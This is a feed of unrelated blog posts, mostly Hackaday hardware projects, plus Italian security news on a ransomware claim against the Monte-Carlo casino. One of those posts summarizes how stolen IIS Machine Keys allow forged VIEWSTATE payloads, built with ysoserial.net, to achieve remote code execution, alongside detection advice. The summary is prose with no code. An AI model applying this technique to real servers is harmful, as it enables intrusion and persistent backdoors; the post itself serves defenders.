To use the device, first thread the filament into the beginning of the Bowden tube. The idler gear is on a hinge, such that clamping it into position around the filament with the main gear activates the microswitch and turns the motor on, driving the filament all the way to the extruder. Job done! [Mr Flippant] notes that the filament should be as straight and unkinked as possible for best results, but that’s good advice when 3D printing in general.

Funnily enough, around these parts, when we talk about speed loaders, we’re usually discussing tapes.

youtube.com/embed/EtV3ZXkA_nE?…

youtube.com/embed/qL7nFMtGzdM?…

Thanks to [LookAtDaShinyShiny] for the tip!

hackaday.com/2025/08/06/a-spee…

Red Hot Cyber ha ricevuto e condivide con i propri lettori il comunicato ufficiale di Monte-Carlo Société des Bains de Mer, il celebre casinò di Montecarlo, in merito a un recente episodio di possibile compromissione informatica che ha attirato l’attenzione mediatica e del mondo della cybersecurity.

Domenica 3 agosto, la società ha preso atto di una rivendicazione pubblicata dal gruppo ransomware D4rk4rmy, che ha dichiarato di aver condotto un attacco informatico ai danni del Casinò di Montecarlo e di aver pubblicato dati estratti, in particolare una lista di contatti limitata a dipendenti e clienti, sul proprio sito.

Il comunicato recita testualmente:

Monte-Carlo Société des Bains de Mer ha preso atto domenica 3 agosto di una possibile compromissione della propria reputazione, riconducibile alla rivendicazione di un presunto attacco informatico. Tale atto riguarderebbe l’accesso a un numero molto limitato di contatti tra dipendenti e clienti.

Abbiamo immediatamente avviato indagini su tutte le fonti possibili e, parallelamente, abbiamo informato tutte le autorità competenti del Principato di Monaco – l’Agenzia Monegasca per la Sicurezza Informatica (AMSN), l’Autorità per la Protezione dei Dati Personali (APDP), la Direzione della Sicurezza Pubblica – con le quali siamo attivamente impegnati.

Abbiamo provveduto personalmente a presentare una denuncia.
A questo stadio, non è stata rilevata alcuna intrusione o anomalia nei nostri sistemi informatici, né alcun impatto sulle nostre operazioni.

Tutti i team competenti restano pienamente mobilitati per verificare e analizzare, nel più breve tempo possibile, la veridicità di questo presunto attacco informatico, l’autenticità e l’appartenenza dei dati eventualmente compromessi.

L’incidente è stato pubblicamente rivendicato dal gruppo D4rk4rmy, noto per attacchi ransomware di matrice criminale, che ha reso visibile la sua azione tramite il proprio portale online, diffondendo una parte dei dati sottratti come forma di pressione sul casinò per un riscatto.

Ad oggi, il Casinò di Montecarlo conferma che nessun danno operativo è stato rilevato, e che le indagini sono tuttora in corso per stabilire l’effettivo impatto dell’evento.

Ringraziando il Casinò di Montecarlo per le preziose informazioni, Red Hot Cyber continuerà a monitorare la situazione e a fornire aggiornamenti non appena emergeranno nuovi dettagli da fonti ufficiali e investigative.

L'articolo Il Casinò di Montecarlo scrive a RHC: “A questo stadio, non è stata rilevata alcuna intrusione” proviene da il blog della sicurezza informatica.

In un articolo pubblicato il 5 agosto 2025 sul blog ISC SANS da parte di Bojan Zdrnja, è possibile effettuare il furto delle “chiavi di macchina” (Machine Keys) nei server IIS. L’autore esplora il meccanismo di queste chiavi e come possano essere sfruttate, in particolare alla luce di recenti exploit ToolShell per Microsoft SharePoint. Il furto di una Machine Key rappresenta una minaccia significativa, consentendo agli attaccanti di superare le misure di protezione dei dati, come la validazione del VIEWSTATE, e potenzialmente ottenere un accesso persistente.

Una Machine Key è un’impostazione di configurazione cruciale in IIS e ASP.NET, utilizzata per proteggere dati sensibili come il VIEWSTATE, i cookie e lo stato della sessione. La sua funzione principale è convalidare e crittografare questi dati per impedire manomissioni non autorizzate. L’autore spiega come in ASP.NET Web Forms, il VIEWSTATE sia un meccanismo progettato per mantenere lo stato dei controlli e dei dati della pagina tra i postback al server.

Per impostazione predefinita, IIS abilita la validazione del VIEWSTATE MAC (Message Authentication Code), ma la crittografia è spesso impostata su “Auto”, il che significa che potrebbe non essere sempre in uso. La Machine Key è essenziale per questa validazione, che tipicamente impiega algoritmi come SHA1 o HMACSHA256. L’autore sottolinea che, se un attaccante riesce a impossessarsi della Machine Key di un server, può alterare i valori del VIEWSTATE e dei cookie a suo piacimento.

Il possesso di una Machine Key valida può portare a conseguenze molto gravi, tra cui l’esecuzione di codice in remoto. Il testo illustra due modi in cui una chiave di macchina è comunemente conservata: o viene generata automaticamente da IIS e salvata nel registro di sistema, oppure viene creata dall’amministratore e archiviata in chiaro nel file web.config. L’autore nota che gli attaccanti che sfruttano vulnerabilità come l’inclusione di file o le entità esterne XML (XXE) possono spesso recuperare il file web.config per rubare la chiave.

Anche nel caso in cui la chiave sia generata automaticamente e si trovi nel registro, un attaccante che ha già ottenuto l’esecuzione di codice sul server può comunque leggerla. L’articolo fornisce un esempio pratico, un “proof-of-concept”, che dimostra come una Machine Key rubata possa essere sfruttata per l’esecuzione di codice remoto. Utilizzando uno strumento come ysoserial.net, un aggressore può creare un oggetto VIEWSTATE dannoso.

Poiché l’attaccante possiede la Machine Key valida, il server convaliderà con successo il MAC dell’oggetto e cercherà di deserializzarlo, attivando il codice malevolo. L’autore enfatizza che, una volta che un attaccante ha in mano una Machine Key valida, ha di fatto creato una “backdoor persistente” al server, che funzionerà su qualsiasi pagina ASPX all’interno dell’applicazione.

Infine, l’articolo offre un suggerimento per gli amministratori, spiegando che possono rilevare tali attacchi monitorando l’evento con codice 4009 nel log delle applicazioni di Windows. Questo evento viene generato quando la deserializzazione del VIEWSTATE fallisce, e l’intero oggetto VIEWSTATE viene registrato, permettendo un’ispezione più approfondita.

L'articolo Con ToolShell, è possibile accedere alle Machine key di Internet information Services (IIS) proviene da il blog della sicurezza informatica.

[Avi Gupta] recently sent in their LoRaSense RGB Pi HAT project. This “HAT” (Hardware Attached to Top) is for any Raspberry Pi with 40-pin header. The core of the build is the custom printed circuit board which houses the components and interconnects. The components include an SHT31 temperature and humidity sensor, an SX1278 LoRa module, and a 10 amp 220 VAC relay. The interconnects include support for UART, I2C, SPI, and WS2812B RGB LED interfaces as well as a stackable header for daisy chaining HATs.

The attached components in combination support a wide range of use cases. Possible uses for this Raspberry Pi HAT include smart home systems, agricultural projects, industrial monitoring, smart greenhouse, remote weather stations, or alerting systems. You can detect weather conditions, send and receive information, switch mains powered loads, and use RGB LEDs for status and alerting.

If you’re interested in LoRa technology be sure to read about the Yagi antenna that sends LoRa signals farther.

hackaday.com/2025/08/05/lorase…

Web systems are designed to be simple and reliable. Designing for the everyday person is the goal, but if you don’t consider the odd man out, they may encounter some problems. This is the everyday life for some people with names that often have unconsidered features, such as apostrophes or spaces. This is the life of [Luke O’Sullivan], who even had to fly under a different name than his legal one.

[O’Sullivan] is far from a rare surname, but presents an interesting challenge for many computer systems. Systems from the era of penny pinching every bit relied on ASCII. ASCII only included 128 characters, which included a very small set of special characters. Some systems didn’t even include some of these characters to reduce loading times. Throw on the security features put in place to prevent injection attacks, and you have a very unfriendly field for many uncommon names.

Unicode is a newer standard with over 150,000 characters, allowing for nearly any character. However, many older systems are far from easy or cheap to convert to the new standard. This leaves many people to have to adapt to the software rather than the software adapting to the user. While this is simply poor design in general, [O’Sullivan] makes sure to point out how demeaning this can be for many people. Imagine being told that your name isn’t important enough to be included, or told that it’s “invalid”.

One excuse that gets thrown about is the aforementioned injection prompts that can be used to affect these systems. This can cause systems to crash or even change settings; however, it’s not just these older systems that get affected. For modern-day injection prompts, check out how AI models can get affected!

youtube.com/embed/0f3RMYTCvMU?…

Thanks to Ken Fallon for the tip!

hackaday.com/2025/08/05/why-na…

Entries keep ticking in for the One Hertz Challenge, some more practical than others. [Pierre-Loup M.]’s One Hertz Sculpture has no pretensions of being anything but pretty, but we can absolutely respect the artistic impulse behind it.

The sculpture is a free-form circuit inside of a picture frame. There are 9 LEDs in a ring with a few other components to produce a reverse-chase effect (one going dark at a time) taking about 1 second to circle the sculpture. As far as free-form circuit art goes, it’s handsomely done, but as this is Hackaday it’s probably the electronics, rather that the aesthetics that are of interest.

The circuit is an example of a ring oscillator: a cascading chain of NOT gates, endlessly feeding into and inverting one
Without timing it, it looks like 1 Hz, even if we know it’s not.
another. The NOT gates are implemented in resistor-transistor logic with 2N3904 NPN transistors, nine in total. Of course the inverter delay of this sort of handmade logic gate is far too fast for an aesthetically pleasing (or visible) chase, so some extra circuitry is needed to slow down the oscillations to something less than the 5 MHz it would naturally do. This is affected by pairing every transistor with an RC oscillator. Ideally the RC oscillator would have a 0.111..s period (1/9th of a second), but a few things got in the way of that. The RC oscillator isn’t oscillating in a vacuum, and interactions with the rest of the circuit have it running just a little bit fast. That’s really of no matter; a simple oscillator circuit like this wasn’t going to be a shoe in for the accuracy-based Time Lords category of this contest. As a sculpture and not a clock, you’re not going to notice it isn’t running at exactly 1Hz. (Though a ring-oscillator based clock would be a sight indeed.)

We’ve seen ring oscillators before, including inside the venerable 8087 coprocessor and this delightfully romantic beating-heart gift, but this is the first one that seems to have entered the One Hertz Challenge.

If you have a hankering for hertz, the contest is still open, but you’d better get ticking! The contest closes August 19th.

hackaday.com/2025/08/05/2025-o…

If you were at OpenSauce, you may have seen new Youtuber [Sahko] waltzing about with a retrofuturistic peice of jewelery that revealed itself as a very cool watch. If you weren’t, he’s his very first video on YouTube detailing the design and construction of this piece. We’ve embedded it below, and it’s worth a watch. (Pun intended, as always.)

The build was inspired by the delightful amber LED dot-matrix display modules that circle the band of the watch. They go by HCMS2901, but [Sahko] recommends using the HCMS3901 as it’s both more 3.3V-tolerant and easier to find now. A challenge in mounting so many displays was the voltage on the supply rail dropping below the logic level; presumably the newer version does not have this problem to the same degree. Either way we love the look of these little displays and are pondering projects of our own that might include them.

He’s got quite a few wrapped around his wrist, so at full brightness, all these displays draw one amp. That explains why like the LED watches of the 1970s, the default state of the displays is “OFF”. Even with a LiPo pouch salvaged from a disposable vape, the runtime would only be half an hour at full brightness without that periodicity. Luckily [Sahko] included buttons on the band of the watch to activate it and control the brightness so it isn’t always blasting at full. There are also different modes available, including a really cool waterfall effect you can see in the video.

The band is an interesting choice, too: it’s just a flex PCB. There’s nothing backing it, aside from its own stiffeners, which makes us very curious how well this watch would hold up to daily use. There’s no clasp in the traditional sense, either: the band is closed by a 4-pin connector that doubles as both charge and the USB programmer for the stm32u08 microcontroller that runs the displays. Conveniently for a watch, this version of the stm32 has an RTC, so it keeps time as well. We dig the minimalism of this design; it’s a great contrast to the maximalism of wrapping your wrist in displays.

We’ve seen very similar displays on an edge-viewed watch, but a tiny amber LED matrix never gets old. If you wrapping your wrist in all those tiny LEDs is too impractically power-hungry, try using Nixie tubes.

We’re always watching for projects– wrist mounted clocks or otherwise– so if you’ve got the time, please drop us a tip.

youtube.com/embed/dBEupkQBFis?…

hackaday.com/2025/08/05/flex-p…

Making an LED blink is usually achieved by interrupting its power supply, This can be achieved through any number of oscillator circuits, or even by means of a mechanical system and a switch. For the 2025 One Hertz Challenge though, [jeremy.geppert] has eschewed such means. Instead his LED is always on, and is made to flash by interrupting its light beam with a gap once a second.

This mechanical solution is achieved via a disk with a hole in it, rotating once a second. This is driven from a gear mounted on a 4.8 RPM geared synchronous motor, and the hack lies in getting those gears right. They’re laser cut from ply, from an SVG generated using an online gear designer. The large gear sits on the motor and the small gear on the back of the disk, which is mounted on a bearing. When powered up it spins at 60 RPM, and the LED flashes thus once a second.

We like this entry for its lateral thinking simplicity. The awesome 2025 One Hertz Challenge is still ongoing, so there is still plenty of time for you to join the fun!

youtube.com/embed/zE0s_xlJF18?…

hackaday.com/2025/08/05/2025-o…

The wait is over — once this post hits the front page, ticket sales for the 2025 Hackaday Supercon will officially be live!

As is tradition, we’ve reserved 100 tickets priced at $148 (plus fees) for what we like to call the True-Believers. Those are the folks that are willing to sign up even without knowing who will be speaking or what this year’s badge looks like. Once those are sold out, the regular admission tickets will cost $296 (plus fees). We might be slightly biased, but even at full price, we like to think Supercon is a screaming deal.

Those who join us in Pasadena, California from October 31st through November 2nd can look forward to a weekend of talks, workshops, demos, and badge hacking. But what’s more, you’ll experience the unique sense of camaraderie that’s produced when you pack hundreds of hardware hackers into an alleyway and ply them with as much caffeine as they can handle. Some treat it like a normal hacker con, others as a social experiment, but nobody thinks of it as anything less than a fantastic time.

We’re still working closely with our friends at Supplyframe, DigiKey, and Framework to put together a full itinerary for Supercon 2025, so stay tuned over the coming weeks as things are finalized. But in the meantime, we’ve got a couple new additions this year that we’re pretty excited about.

Friday Halloween Party

Last year it worked out that the night before Supercon happened to align with Halloween, so we put together a little pre-con costume party. It was a big hit, and since this year the first day of Supercon will actually fall on All Hallows’ Eve, we decided to really lean into it.

So on Friday night from 5:00 to 10:00 PM, we’ll be hosting a sci-fi themed costume party at the Supplyframe HQ. There will be prizes for the best dressed, and we’ll obviously be on the lookout for costumes that incorporate futuristic, retro-futuristic, or sci-fi techie details. And being a Hackaday event, there’s no such thing as too many LEDs.

Those who’ve joined us in the past may notice that the time and location of the party puts it during what could best be described as the “general hacking” period of Friday evening. Fear not. Participation is completely optional, and attendees who wish to keep their head down and continue working on their badge will of course be free to do so. It’s what Mr. Spock would do.

Call for Retro Communications Tech!

We love Retro Tech at Hackaday, and we know you do to. That’s why this year we’re curating a crowd-sourced exhibit of retro communication electronics from 1940 to 2000: radios, pagers, walkie-talkies, early cell phones, ham rigs, weird prototypes, you name it. Any thematic connection between this project and the Supercon 2025 badge may or may not be completely coincidental.

If you’ve got gear that talked, beeped, buzzed, or connected us before the age of the smartphone, we want to see it. So get it out of the attic, dust it off, tell us its story, and help bring this exhibit to life. As with last year’s popular Display Tech exhibit, all of the hardware will be considered on loan, and it will be returned to its owner after the event. Shipping shouldn’t be too much of an issue for handheld devices, but for the larger pieces of hardware, we’d ideally be looking for stuff that’s already in the Southern California area. That said, if you’ve got something really unique that you’d like to show off, don’t be afraid to contact us — we’ll probably be able to work something out.

The deadline for submissions is September 1st, and the hardware itself will need to be in Pasadena by September 30th to be included in the exhibit. If you’re interested, just fill out this form and we’ll be in touch.

All We Need Now is You!

We’ll be scrambling behind the scenes up until the very last minute (and maybe a bit over) to put together another unforgettable Supercon, but the truth is, the most important part of the equation is the attendees. An event is only as good as the folks who show up, and for the last several years, we’ve been fortunate enough to have an incredible cast of hackers and makers join us for an event that we truly believe is unlike anything else out there.

Whether you’re a veteran of several Supercons, or thinking of making 2025 your first year, we can’t wait to see you in November.

hackaday.com/2025/08/05/get-yo…

Admit it. You’d get through boring classes in school by daydreaming of cool things you’d like to build. If you were like us, some of them were practical, but some of them were flights of fancy. Did you ever think of an airplane that could dive under the water? We did. So did some students at Aalborg University. The difference is they built theirs. Watch it do its thing in the video below.

As far as we can tell, the drone utilizes variable-pitch props to generate lift in the air and downward thrust in water. In addition to the direction of the thrust, water operations require a lower pitch to minimize drag. We’d be interested in seeing how it is all waterproofed, and we’re unsure how deep the device can go. No word on battery life either. From the video, we aren’t sure how maneuverable it is while submerged, but it does seem to have some control. It wouldn’t be hard to add a lateral thruster to improve underwater operations.

This isn’t the first vehicle of its kind (discounting fictional versions). Researchers at Rutgers created something similar in 2015, and we’ve seen other demonstrations, but this is still very well done, especially for a student project.

We did see a submersible drone built using parts from a flying drone. Cool, but not quite the same.

youtube.com/embed/g7vmPFZrYAk?…

hackaday.com/2025/08/05/studen…